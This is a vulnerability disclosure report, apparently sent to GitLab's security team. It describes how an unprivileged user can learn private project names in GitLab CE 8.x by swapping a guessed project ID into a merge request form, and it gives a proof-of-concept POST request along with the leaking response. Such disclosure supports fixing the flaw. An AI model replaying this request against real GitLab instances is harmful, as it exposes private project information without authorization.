Private project name disclosure in merge requests
This vulnerability was reported via the security@gitlab.com
email address. The email is shown below.
1 SUMMARY
The Gitlab merge request feature allows to view the name of private projects to unpriviledged users.
2 AFFECTED PRODUCTS
The following Products have been tested as vulnerable so far:
Gitlab-CE: 8.11.11, 8.16.1, 8.16.4
3 DETAILS
If the ID (numeric, incrementing) of a private project can be guessed by an attacker, he is able to see the name of the project in the merge request formular. To achieve this inconsistent state, one has to replace the project id of a merge request during the second form submission with the id of the private project.
5 PROOF OF CONCEPT
Request
POST /foobar/public/merge_requests HTTP/1.0 [...] utf8=[...]&authenticity_token=[...]&merge_request[title]=Update+README.md&merge_request[description]=&merge_request[lock_version]=&merge_request[source_project_id]=3&merge_request[source_branch]=master&merge_request[target_project_id]=&merge_request[target_branch]=master
Response
HTTP/1.1 200 Ok [...] root/private [...]